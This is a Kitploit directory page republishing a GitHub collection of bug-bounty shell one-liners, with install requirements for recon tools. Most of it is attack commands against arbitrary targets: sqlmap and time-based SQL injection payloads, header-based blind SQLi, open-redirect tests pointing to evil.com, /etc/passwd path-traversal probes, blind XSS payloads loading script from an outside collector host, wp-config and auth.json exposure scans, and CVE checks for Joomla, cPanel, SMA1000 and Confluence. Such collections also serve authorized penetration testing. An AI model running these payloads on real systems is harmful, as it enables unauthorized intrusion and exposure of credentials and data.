Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
One-Liner-Collections — このリポジトリには、ワンライナーのリストとその説明、およびインストール要件が含まれています。 | Kitploit
ツール/GitHubGitHub/cybertix-pvt-ltd/one-liner-collections
脆弱性スキャナーウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテストシークレット検出サブドメイン列挙厳選リソース

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
cybertix-pvt-ltd/one-liner-collections

One-Liner-Collections

このリポジトリには、ワンライナーのリストとその説明、およびインストール要件が含まれています。

リポジトリを見る
509811年前Kitploit レビュー済み

ワンライナーコレクション

このリポジトリには、説明とインストール要件付きのワンライナーのリストが含まれています。

────────────────────────────────────────────────────────────────────────

SQLインジェクション

インストール要件

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. GAU : https://github.com/lc/gau
  3. GF : https://github.com/tomnomnom/gf
  4. Findomain : https://github.com/Findomain/Findomain
  5. HTTPX : https://github.com/projectdiscovery/httpx
  6. Anew : https://github.com/tomnomnom/anew
  7. Waybackurls : https://github.com/tomnomnom/waybackurls
  8. SQLiDetector: https://github.com/eslam3kl/SQLiDetector

ワンライナー

root@kitploit:~
echo http://testphp.vulnweb.com | waybackurls > wayback_urls_for_target.txt ; python3 sqlidetector.py -f  wayback_urls_for_target.txt

root@kitploit:~
subfinder -d http://TARGET.com -silent -all | gau - blacklist ttf,woff,svg,png | sort -u | gf sqli >gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt
root@kitploit:~
findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
root@kitploit:~
cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by Cybertix\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done

root@kitploit:~
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

ヘッダーベースのブラインドSQLインジェクション

root@kitploit:~
cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'

時間ベースのSQLインジェクション

  1. apt install moreutils
  2. apt install parallel
root@kitploit:~
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt

Waybackurlsを使った時間ベースのSQLインジェクション

root@kitploit:~
waybackurls https://TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt 
root@kitploit:~
cat urls.txt | sed 's/=/=(CASE%20WHEN%20(888=888)%20THEN%20SLEEP(5)%20ELSE%20888%20END)/g' | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && time curl "'{}'"'

────────────────────────────────────────────────────────────────────────

オープンリダイレクション

インストール要件

  1. Waybackurls : https://github.com/tomnomnom/waybackurls
  2. Bhedak : https://github.com/R0X4R/bhedak
  3. GAU : https://github.com/lc/gau
  4. GF : https://github.com/tomnomnom/gf
  5. QS-Replace : https://github.com/tomnomnom/qsreplace
  6. HTTPX : https://github.com/projectdiscovery/httpx
  7. Subfinder : https://github.com/projectdiscovery/subfinder
  8. Httprobe : https://github.com/tomnomnom/httprobe
  9. Nuclei : https://github.com/projectdiscovery/nuclei

ワンライナー

root@kitploit:~
waybackurls TARGET.COM | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "evil.com" && echo "$host \033[0;31mVulnerable\n" ;done
root@kitploit:~
subfinder -dL domains.txt | httprobe |tee live_domain.txt; cat live_domain.txt | waybackurls | tee wayback.txt; cat wayback.txt | sort -u | grep "\?" > open.txt; nuclei -t Url-Redirection-Catcher.yaml -l open.txt

────────────────────────────────────────────────────────────────────────

NGINXパストラバーサル

インストール要件

  1. HTTPX : https://github.com/projectdiscovery/httpx

ワンライナー

root@kitploit:~
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'

────────────────────────────────────────────────────────────────────────

サブドメインテイクオーバー

インストール要件

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. Assetfinder : https://github.com/tomnomnom/assetfinder
  3. Amass : https://github.com/OWASP/Amass
  4. Subjack : https://github.com/haccer/subjack

ワンライナー

root@kitploit:~
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/cybertix/subjack/fingerprints.json -v 3 >> takeover ;

────────────────────────────────────────────────────────────────────────

ソースコードからURLを抽出

ワンライナー

root@kitploit:~
curl "https://TARGET.Com" | grep -oP '(https*.//|www\.)[^]*'

────────────────────────────────────────────────────────────────────────

XSS(クロスサイトスクリプティング)

インストール要件

  1. Katana : https://github.com/projectdiscovery/katana
  2. Dalfox : https://github.com/hahwul/dalfox
  3. Waybackurls : https://github.com/tomnomnom/waybackurls
  4. GF : https://github.com/tomnomnom/gf
  5. Dalfox : https://github.com/hahwul/dalfox
  6. HTTPX : https://github.com/projectdiscovery/httpx

ワンライナー

root@kitploit:~
echo http://testphp.vulnweb.com | katana -jc -f qurl -d 5 -c 50 -kf robotstxt,sitemapxml -silent | dalfox pipe --skip-bav
root@kitploit:~
waybackurls http://testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee XSS.txt && cat XSS.txt | dalfox -b http://chirag.bxss.in pipe > output.txt
root@kitploit:~
cat http://target.com | gau --subs | grep "https://" | grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | uro | dalfox pipe --deep-domxss --multicast --blind https://chirag.bxss.in

ブラインドXSSの大量ハンティング

root@kitploit:~
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"

────────────────────────────────────────────────────────────────────────

JS内のエンドポイントを検索

インストール要件

  1. Katana : https://github.com/projectdiscovery/katana
  2. Anew : https://github.com/tomnomnom/anew

ワンライナー

root@kitploit:~
katana -u http://testphp.vulnweb.com -js-crawl -d 5 -hl -filed endpoint | anew endpoint.txt

────────────────────────────────────────────────────────────────────────

CVE-2023-23752 - WebサービスエンドポイントにおけるJoomlaの不適切なアクセスチェックのワンライナー

インストール要件

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

ワンライナー

root@kitploit:~
subfinder -d http://TARGET.COM -silent -all | httpx -silent -path 'api/index.php/v1/config/application?public=true' -mc 200

────────────────────────────────────────────────────────────────────────

cPanel CVE-2023-29489 XSS ワンライナー

インストール要件

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

ワンライナー

root@kitploit:~
subfinder -d http://example.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/aaaaaaaaaaaaaaa' -mc 400

────────────────────────────────────────────────────────────────────────

WP-Config ワンライナー

インストール要件

  1. Subfinder : https://github.com/projectdiscovery/subfinder
  2. HTTPX : https://github.com/projectdiscovery/httpx

ワンライナー

root@kitploit:~
subfinder -silent -d TARGET.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60 -status-code

────────────────────────────────────────────────────────────────────────

JSシークレットファインダーのワンライナー

インストール要件

  1. Gau : https://github.com/lc/gau
  2. HTTPX : https://github.com/projectdiscovery/httpx
  3. Nuclei : https://github.com/projectdiscovery/nuclei

ワンライナー

root@kitploit:~
echo TARGET.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt

────────────────────────────────────────────────────────────────────────

メモリダンプと環境変数の開示

インストール要件

  1. Shodan : https://www.shodan.io

ワンライナー

root@kitploit:~
shodan search org: "Target" http.favicon.hash:116323821 --fields ip_str,port--separator | awk '{print $1 $2}'

────────────────────────────────────────────────────────────────────────

JSONボディで最も簡単な情報開示

インストール要件

  1. Waybackurls : https://github.com/tomnomnom/waybackurls
  2. HTTPX : https://github.com/projectdiscovery/httpx

ワンライナー

root@kitploit:~
cat subdomains.txt | waybackurls | httpx -mc 200 -ct | grep application/json

────────────────────────────────────────────────────────────────────────

Hostヘッダーに127.0.0.1を使用したファジング

インストール要件

  1. FFUF : https://github.com/ffuf/ffuf

ワンライナー

root@kitploit:~
ffuf -u https://target[.]com/FUZZ -H “Host: 127.0.0.1” -w /home/user/path/to/wordlist.txt -fs <regular_content_length>

────────────────────────────────────────────────────────────────────────

CVE-2023-0126 SMA1000における事前認証パストラバーサル脆弱性

ワンライナー

root@kitploit:~
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done

────────────────────────────────────────────────────────────────────────

対象ドメインのFaviconハッシュを取得

ワンライナー

root@kitploit:~
curl -s -L -k https://TARGET.COM/favicon.ico | python3 -c 'import mmh3, sys, codecs; print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),"base64")))'

────────────────────────────────────────────────────────────────────────

CVE-2023-22515 Confluence Data Center & Server のワンライナー:特権昇格

ワンライナー

root@kitploit:~
cat file.txt | while read host do; do curl -skL "http://$host/setup/setupadministrator.action" | grep -i "<title>Setup System Administrator" && echo $host "Vulnerable"; done

────────────────────────────────────────────────────────────────────────

CVE-2023-22518 - Confluence Data Center and Serverの不適切な認可の脆弱性

ワンライナー

root@kitploit:~
subfinder -d TARGET.COM -silent | httpx -silent | nuclei -t CVE-2023-22518.yaml

────────────────────────────────────────────────────────────────────────

/auth.jsonエンドポイントの機密情報を抽出

ワンライナー

root@kitploit:~
subfinder -d TARGET.COM | httpx -path "/auth.json" -title -status-code -content-length -t 80 -p 80,443,8080,8443,9000,9001,9002,9003

────────────────────────────────────────────────────────────────────────

gauとxargsを使用して速度を落とさずに大量ドメインをスキャン

インストール要件

  1. GAU : https://github.com/lc/gau

ワンライナー

root@kitploit:~
xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,svg,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt

────────────────────────────────────────────────────────────────────────

X-Forwarded-ForヘッダーでのブラインドXSS

インストール要件

  1. BXSS : https://github.com/ethicalhackingplayground/bxss
  2. GAU : https://github.com/lc/gau
  3. Findomain : https://github.com/Findomain/Findomain

ワンライナー

root@kitploit:~
findomain -t TARGET.COM | gau | bxss -payload '"><script src=https://chirag.bxss.in></script>' -header "X-Forwarded-For"

────────────────────────────────────────────────────────────────────────

Googleタグマネージャーを使用したサブドメイン列挙

ワンライナー

root@kitploit:~
curl -s "https://www.googletagmanager.com/gtm.js?id=[TARGET-GTM-ID]" | grep -oP '"key","[a-zA-Z0-9.-]+\.[a-z]{2,}"' | awk -F'"' '{print $4}'

────────────────────────────────────────────────────────────────────────

特定の組織のKubernetesセットアップを検索し、追加情報を調査する

ワンライナー

root@kitploit:~
shodan search org:"google" product:"Kubernetes" | awk '{print $3}' | httpx -path /pods -content-length -status-code -title

────────────────────────────────────────────────────────────────────────

NodeJS Elastic内部ファイル情報漏えい

参考:

https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/#:~:text=4.%20INTERNAL%20PATH%20DISCLOSURE

ワンライナー

root@kitploit:~
while read -r domain; do url="$domain/$(python3 -c 'print("A"*500)')"; response=$(curl -s "$url" 2>/dev/null); if echo "$response" | grep -q "ENAMETOOLONG.*stat"; then echo -e "[VULNERABLE] $url\n$(echo "$response" | grep 'ENAMETOOLONG')"; else echo "[SAFE] $domain"; fi; done < listofdomain.txt

────────────────────────────────────────────────────────────────────────

S3バケットを見つけるワンライナー

インストール要件:

  1. Assetfinder: https://github.com/tomnomnom/assetfinder
  2. HTTPX:https://github.com/projectdiscovery/httpx
  3. Anew: https://github.com/tomnomnom/anew
  4. Meg: https://github.com/tomnomnom/meg
  5. GF Pattern: https://github.com/thecybertix/GF-Patterns

ワンライナー

root@kitploit:~
assetfinder --subs-only TARGET.COM | httpx | anew hosts; meg -d 1000 -v /; gf s3-buckets
ツールをダウンロード